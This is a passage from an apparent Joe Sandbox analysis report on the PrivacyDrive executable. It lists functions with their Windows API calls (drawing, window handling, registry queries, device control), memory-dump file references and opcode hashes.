                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004A047E
                                • GetSystemMetrics.USER32(00000000), ref: 004A048C
                                • GetSystemMetrics.USER32(00000001), ref: 004A049C
                                • SetWindowPos.USER32(00000000), ref: 004A0573
                                • SendMessageW.USER32(?,0000000A,00000001,00000000), ref: 004A0587
                                • EnableWindow.USER32(?,00000001), ref: 004A0590
                                • IsWindowVisible.USER32(?), ref: 004A0597
                                • SetFocus.USER32(?), ref: 004A05A2
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSectionWindow$EnterLeaveSystem$EnableMessageMetricsSend$AllocCacheCurrentDesktopEnabledFlushFocusInfoInstructionParametersProcessVirtualVisible
                                • String ID:
                                • API String ID: 1894409159-0
                                • Opcode ID: 4845bb2ca16c6743520c26e6cfeb3c907d30fd7a799e74f5d1b2e40b019319bd
                                • Instruction ID: ca7d7337173049c433cc300b30aa717aa02b0ec72a163a980d60eaac7abb48ac
                                • Opcode Fuzzy Hash: 4845bb2ca16c6743520c26e6cfeb3c907d30fd7a799e74f5d1b2e40b019319bd
                                • Instruction Fuzzy Hash: C78177716043029FD714CF28CC95B6ABBE4BF99714F044A1EFA8597390DBB8A844CB95
                                Function 0042D280 Relevance: 18.1, APIs: 6, Strings: 6, Instructions: 86COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 0042D290
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0042D2A8
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,TIP), ref: 0042D2D5
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0042D2E7
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,TIP), ref: 0042D314
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0042D326
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: CR_BACKGROUND_BEGIN$CR_BACKGROUND_END$CR_BORDER_HIGH$CR_BORDER_LOW$Dialog$TIP
                                • API String ID: 904232820-1338357848
                                • Opcode ID: 3184883e3bbcf50b103be5c407a2c1b740f3258166e6d1a4ecb10b69ecec8258
                                • Instruction ID: 252201c445374297da46a1710a5ed91b30bf55358ecd8daef3d6722c52a5c2f4
                                • Opcode Fuzzy Hash: 3184883e3bbcf50b103be5c407a2c1b740f3258166e6d1a4ecb10b69ecec8258
                                • Instruction Fuzzy Hash: F42183707803126BEB10E772DD52FE66B987F50B15F04002ABA49E72C0EED4FC45D625
                                Function 004C49B0 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 319registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyW.ADVAPI32(80000000,?,75A8EB20), ref: 004C4BD5
                                • RegQueryValueExW.ADVAPI32(00000000,0056C344,00000000,00000000,00000000,00000001,?,00000001,00000000,00000000,0056C40C,?,00000001,7563D392,00000001), ref: 004C4C42
                                  • Part of subcall function 004FFB7D: std::exception::exception.LIBCMT ref: 004FFB90
                                  • Part of subcall function 004FFB7D: __CxxThrowException@8.LIBCMT ref: 004FFBA5
                                • RegQueryValueExW.ADVAPI32(00000000,0056C344,00000000,00000000,00000000,?), ref: 004C4C7D
                                • RegCloseKey.ADVAPI32(00000000,?,00000001,00000000,00000000,0056C40C,?,00000001,7563D392,00000001), ref: 004C4CAE
                                • SHChangeNotify.SHELL32(08000000,00001000,00000000,00000000), ref: 004C4EC1
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: QueryValue$ChangeCloseException@8NotifyOpenThrowstd::exception::exception
                                • String ID: !@$Privacy Drive$Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\$Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\$invalid string position
                                • API String ID: 1895082097-1561404141
                                • Opcode ID: f12194bfda5edb5633653146d9af3769192e094562b75f6683a09ee85a0deb94
                                • Instruction ID: 06bbfad08b540ed36d750cc14a5df1dee5583b95660a5d29fe410cc3e41718d2
                                • Opcode Fuzzy Hash: f12194bfda5edb5633653146d9af3769192e094562b75f6683a09ee85a0deb94
                                • Instruction Fuzzy Hash: AEE139B0A002289ADB60DF54CD55BDEB7B8AF54308F5041EDE609B3291DB746B88CF6D
                                Function 004A3510 Relevance: 16.7, APIs: 11, Instructions: 219COMMON
                                Download Yara Rule
                                APIs
                                • GetDC.USER32(00000000), ref: 004A354E
                                • GdipCreateFromHDC.GDIPLUS(00000000,000000FF), ref: 004A356B
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 004A35C4
                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004A35DB
                                • GdipSetTextRenderingHint.GDIPLUS(005496D0,00000005), ref: 004A3617
                                • GdipSetStringFormatTrimming.GDIPLUS(00000000,00000002), ref: 004A362D
                                • GdipMeasureString.GDIPLUS(005496D0,?,000000FF,00000000,?,00000000,00000000,?,?), ref: 004A3679
                                • GdipMeasureString.GDIPLUS(005496D0,?,000000FF,00000000,?,00000000,00000000,?,?), ref: 004A3737
                                • ReleaseDC.USER32(00000000,?), ref: 004A378D
                                • GdipDeleteStringFormat.GDIPLUS(00000000), ref: 004A379A
                                • GdipDeleteGraphics.GDIPLUS(005496D0), ref: 004A37AA
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$String$Format$CreateDeleteMeasure$FromGraphicsHintInfoParametersReleaseRenderingSystemTextTrimming
                                • String ID:
                                • API String ID: 106890554-0
                                • Opcode ID: 5890bdb8e7a74715a0ee46108134513eac91f680ffebe5860ef7377ea31df84d
                                • Instruction ID: 39dda621fb170c209f9bae212b4b28789da7fc75bb3bdaa9c85f2a86434fbbe9
                                • Opcode Fuzzy Hash: 5890bdb8e7a74715a0ee46108134513eac91f680ffebe5860ef7377ea31df84d
                                • Instruction Fuzzy Hash: D8913675E00308EFDB01CFA9D994A9DBBB4FF5A701F14821AE815BB290E734A945DF50
                                Function 0041B6F0 Relevance: 16.7, APIs: 11, Instructions: 217COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004CBC00: GdipCreateSolidFill.GDIPLUS(?,FFFFFFFF), ref: 004CBC55
                                  • Part of subcall function 004CBC00: GdipFillRectangle.GDIPLUS(?,00000000), ref: 004CBCAB
                                  • Part of subcall function 004CBC00: GdipDeleteBrush.GDIPLUS(00000000), ref: 004CBCC7
                                • GdipGetImageWidth.GDIPLUS(?,00000000,?,00000000,00000000), ref: 0041B75A
                                • GdipDrawImage.GDIPLUS(?,00000000), ref: 0041B7B9
                                • GdipGetImageWidth.GDIPLUS(?,00000000), ref: 0041B7E1
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 0041B81E
                                • GdipGetImageWidth.GDIPLUS(?,?,?,?), ref: 0041B84E
                                • GdipDrawImage.GDIPLUS(?,00000000), ref: 0041B8BD
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 0041B8DF
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000000), ref: 0041B8F7
                                • GdipSetStringFormatLineAlign.GDIPLUS(?,00000001), ref: 0041B910
                                • GdipGetImageWidth.GDIPLUS(?,00000000), ref: 0041B946
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,?,?,?,FF414141,00000000,?,?,?,FF414141), ref: 0041B9B2
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$Image$Width$FormatString$AlignCreateDeleteDrawFill$BrushLineRectangleSolid
                                • String ID:
                                • API String ID: 1060473745-0
                                • Opcode ID: f6a606b4eb581658c7e629b46e165f12fea829e2425ac2cd4e2d51314c96d511
                                • Instruction ID: 5b93129b29db21c0d9eb51a47d62c76178d00eadee66308f1042f0f98f3860ef
                                • Opcode Fuzzy Hash: f6a606b4eb581658c7e629b46e165f12fea829e2425ac2cd4e2d51314c96d511
                                • Instruction Fuzzy Hash: 80911475204705AFC714CF25C884B5ABBE5FF89714F048A2DF899973A0E730E854DB91
                                Function 0041B9D0 Relevance: 16.7, APIs: 11, Instructions: 217COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004CBC00: GdipCreateSolidFill.GDIPLUS(?,FFFFFFFF), ref: 004CBC55
                                  • Part of subcall function 004CBC00: GdipFillRectangle.GDIPLUS(?,00000000), ref: 004CBCAB
                                  • Part of subcall function 004CBC00: GdipDeleteBrush.GDIPLUS(00000000), ref: 004CBCC7
                                • GdipGetImageWidth.GDIPLUS(?,00000000,?,00000000,00000000), ref: 0041BA3A
                                • GdipDrawImage.GDIPLUS(?,00000000), ref: 0041BA99
                                • GdipGetImageWidth.GDIPLUS(?,00000000), ref: 0041BAC1
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 0041BAFE
                                • GdipGetImageWidth.GDIPLUS(?,?,?,?), ref: 0041BB2E
                                • GdipDrawImage.GDIPLUS(?,00000000), ref: 0041BB9D
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 0041BBBF
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000000), ref: 0041BBD7
                                • GdipSetStringFormatLineAlign.GDIPLUS(?,00000001), ref: 0041BBF0
                                • GdipGetImageWidth.GDIPLUS(?,00000000), ref: 0041BC26
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,?,?,?,FF414141,00000000,?,?,?,FF414141), ref: 0041BC92
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$Image$Width$FormatString$AlignCreateDeleteDrawFill$BrushLineRectangleSolid
                                • String ID:
                                • API String ID: 1060473745-0
                                • Opcode ID: 85fb0716d7b6b49d8a71fc5851715fb9ea630a9b1e10a141e884ff53e867db09
                                • Instruction ID: 723f04de026b6bce35317fdf31a233da12587136ab6fdb08ad58b2235d7c645a
                                • Opcode Fuzzy Hash: 85fb0716d7b6b49d8a71fc5851715fb9ea630a9b1e10a141e884ff53e867db09
                                • Instruction Fuzzy Hash: 0D911475208705AFC714CF29C884A5ABBE5FF89314F048A1EF899973A0EB30E854DF95
                                Function 004342A0 Relevance: 16.7, APIs: 11, Instructions: 197sleepwindowCOMMON
                                Download Yara Rule
                                APIs
                                • GetWindowRect.USER32(00000000), ref: 004342E2
                                  • Part of subcall function 004CB410: GdipSetSmoothingMode.GDIPLUS(?,00000003,?,lB,0056CE40,?,?,?,?,0042E96C,?,?), ref: 004CB477
                                • __CxxThrowException@8.LIBCMT ref: 00434336
                                  • Part of subcall function 00502BEB: RaiseException.KERNEL32(?,?,7563D392,005A7F20,?,?,?,?,?,004FFD4E,7563D392,005A7F20,?,00000001), ref: 00502C40
                                • QueryPerformanceFrequency.KERNEL32(?,?,00577AF8), ref: 00434363
                                • QueryPerformanceCounter.KERNEL32(?), ref: 00434388
                                • QueryPerformanceCounter.KERNEL32(?), ref: 004343D4
                                • GdipGraphicsClear.GDIPLUS(?,00000000), ref: 0043445D
                                • GetDC.USER32(00000000), ref: 004344D3
                                • UpdateLayeredWindow.USER32(?,00000000,00000000,?,?,00000000,00000000,00000000,00000002), ref: 004344FC
                                • ReleaseDC.USER32(00000000,00000000), ref: 00434505
                                • Sleep.KERNEL32(0000000A), ref: 0043450D
                                • PostMessageW.USER32(00000000), ref: 00434545
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: PerformanceQuery$CounterGdipWindow$ClearExceptionException@8FrequencyGraphicsLayeredMessageModePostRaiseRectReleaseSleepSmoothingThrowUpdate
                                • String ID:
                                • API String ID: 2630759416-0
                                • Opcode ID: d79de5b915a1d7d8d19041ace2db1fe06813aecfff2bb6ad53b21545eee6f333
                                • Instruction ID: f5128098092fa105b9cd5fdf089ddcbc3ad0924b79c7ef4185e5b0093c6cfb9a
                                • Opcode Fuzzy Hash: d79de5b915a1d7d8d19041ace2db1fe06813aecfff2bb6ad53b21545eee6f333
                                • Instruction Fuzzy Hash: 3D912775D006189FDB11CFA8D898BDEBBB8FF59304F10426AE819B7251DB34A985CF50
                                Function 004A71B0 Relevance: 16.6, APIs: 11, Instructions: 140windowCOMMON
                                Download Yara Rule
                                APIs
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A6BCC
                                • DeviceIoControl.KERNEL32(?,07770C34,00000000,00000000,00000000,00004186,7563D392,00000000), ref: 004A6BE6
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A6C0D
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A6C31
                                • EnterCriticalSection.KERNEL32(005BE2CC), ref: 004A6C84
                                • LeaveCriticalSection.KERNEL32(005BE2CC,?), ref: 004A6C97
                                • EnterCriticalSection.KERNEL32(005BE2CC), ref: 004A6CC0
                                • LeaveCriticalSection.KERNEL32(005BE2CC), ref: 004A6CCD
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$MessagePeek$EnterLeave$ControlDevice
                                • String ID:
                                • API String ID: 1761629311-0
                                • Opcode ID: ff1c069342d43516b48a516ac4b44da53b82304d07ad053cf874c026a89a8c33
                                • Instruction ID: 1d2f3ce85e670feacd16a1eda1433550c9d54b7a95cde47fb54ccb38de6f1f15
                                • Opcode Fuzzy Hash: ff1c069342d43516b48a516ac4b44da53b82304d07ad053cf874c026a89a8c33
                                • Instruction Fuzzy Hash: 0641A771A00318BBEB10DF90CC49F9A77B8EB15711F15406AFB05AB2C0DBB8A945CB95
                                Function 004A6B80 Relevance: 16.6, APIs: 11, Instructions: 138windowCOMMON
                                Download Yara Rule
                                APIs
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A6BCC
                                • DeviceIoControl.KERNEL32(?,07770C34,00000000,00000000,00000000,00004186,7563D392,00000000), ref: 004A6BE6
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A6C0D
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A6C31
                                  • Part of subcall function 004FFCFE: std::exception::exception.LIBCMT ref: 004FFD34
                                  • Part of subcall function 004FFCFE: __CxxThrowException@8.LIBCMT ref: 004FFD49
                                  • Part of subcall function 004FFCFE: type_info::_Type_info_dtor.LIBCMT ref: 004FFD56
                                • EnterCriticalSection.KERNEL32(005BE2CC), ref: 004A6C84
                                • LeaveCriticalSection.KERNEL32(005BE2CC,?), ref: 004A6C97
                                • EnterCriticalSection.KERNEL32(005BE2CC), ref: 004A6CC0
                                • LeaveCriticalSection.KERNEL32(005BE2CC), ref: 004A6CCD
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A6D0A
                                • EnterCriticalSection.KERNEL32(005BE2CC), ref: 004A6D10
                                • LeaveCriticalSection.KERNEL32(005BE2CC,0000008C), ref: 004A6D30
                                  • Part of subcall function 004A6ED0: EnterCriticalSection.KERNEL32(005BE2CC,005BE2AC,?,?,?,004A6D66,00000000,00000000,005BE2AC), ref: 004A6EE0
                                  • Part of subcall function 004A6ED0: LeaveCriticalSection.KERNEL32(005BE2AC,?,?,?,004A6D66,00000000,00000000,005BE2AC), ref: 004A6F49
                                  • Part of subcall function 004FFCFE: _malloc.LIBCMT ref: 004FFD16
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeaveMessagePeek$ControlDeviceException@8ThrowType_info_dtor_mallocstd::exception::exceptiontype_info::_
                                • String ID:
                                • API String ID: 1362532578-0
                                • Opcode ID: 83d394ebbdc2c39c865c6fe841e20bfeeca3ba7048219cb1643518fe4f0463e6
                                • Instruction ID: a5da356c8d1767b26f23f397bb59cde1352586ba300697f3f32f5539806e1a7f
                                • Opcode Fuzzy Hash: 83d394ebbdc2c39c865c6fe841e20bfeeca3ba7048219cb1643518fe4f0463e6
                                • Instruction Fuzzy Hash: 1341A771A40318ABEB10DF90CC49F9A7778EB15710F154069FB05AB2C0DBB86905CB55
                                Function 0044D780 Relevance: 16.6, APIs: 6, Strings: 5, Instructions: 80COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,0044D8D5,7563D392,?,00000000,?,00541480,000000FF,?,004ACB4E,?,?,FFFFFFFF), ref: 0044D790
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,004ACB4E,?,?,FFFFFFFF,?,?,00000000,?,?,?,75C0B400), ref: 0044D7A8
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,MOUNT_VOLUME,?,004ACB4E,?,?,FFFFFFFF,?,?,00000000,?,?,?), ref: 0044D7D5
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,004ACB4E,?,?,FFFFFFFF,?,?,00000000,?,?,?,75C0B400), ref: 0044D7E7
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,MOUNT_VOLUME,?,004ACB4E,?,?,FFFFFFFF,?,?,00000000,?,?,?), ref: 0044D814
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,004ACB4E,?,?,FFFFFFFF,?,?,00000000,?,?,?,75C0B400), ref: 0044D826
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: Dialog$MOUNT_VOLUME$PM_EXPAND_HEIGHT$PM_HEIGHT$PM_WIDTH
                                • API String ID: 904232820-1496781244
                                • Opcode ID: 246aa87afa2c323b5010a2bf15a9e526ae3d67f439db5891a926733130d192ad
